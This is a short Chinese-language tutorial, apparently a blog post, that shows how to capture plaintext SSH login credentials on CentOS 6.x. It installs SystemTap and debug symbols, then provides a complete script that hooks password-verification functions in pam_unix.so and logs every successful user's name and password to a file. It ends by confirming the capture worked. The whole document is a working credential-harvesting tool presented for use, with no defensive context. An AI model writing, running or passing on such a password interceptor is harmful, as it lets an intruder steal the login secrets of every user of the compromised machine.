centos6.x 抓取ssh登录的用户名和密码

定位

原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获，因为用户登录认证需要使用pam_unix.so库文件。

测试环境：CentOS6.4 32位
内核版本：2.6.32-358.el6.i686

yum --releasever=6.4 update

yum install -y systemtap

debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

创建文件，写入以下代码

touch /root/capture_pass.stp

1. #!/usr/bin/stap
   
2. global username, pass, isSuccRet = 1;
   
3. probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
   
4. {
   
5. username = user_string($name);
   
6. pass = user_string($p);
   
7. }
   
8. probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
   
9. {
   
10. if ($return == 0)
    
11. {
    
12. printf("User: %sPassword: %s", username, pass);
    
13. isSuccRet = 0;
    
14. }
    
15. }
    
16. probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
    
17. {
    
18. if (isSuccRet != 0)
    
19. {
    
20. printf("Login via ssh service.User: %sPassword: %s", username, pass);
    
21. }
    
22. isSuccRet = 1;
    
23. }

复制代码

创建一个记录密码的文件

touch password.txt

赋予可执行权限

chmod +x capture_pass.stp

执行systemstap脚本

stap capture_pass.stp -o password.txt

本地执行capture_pass.stp脚本，同时ssh远程登录系统，即使第一次登录失败也没有问题，不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行，查看password.txt，成功捕获。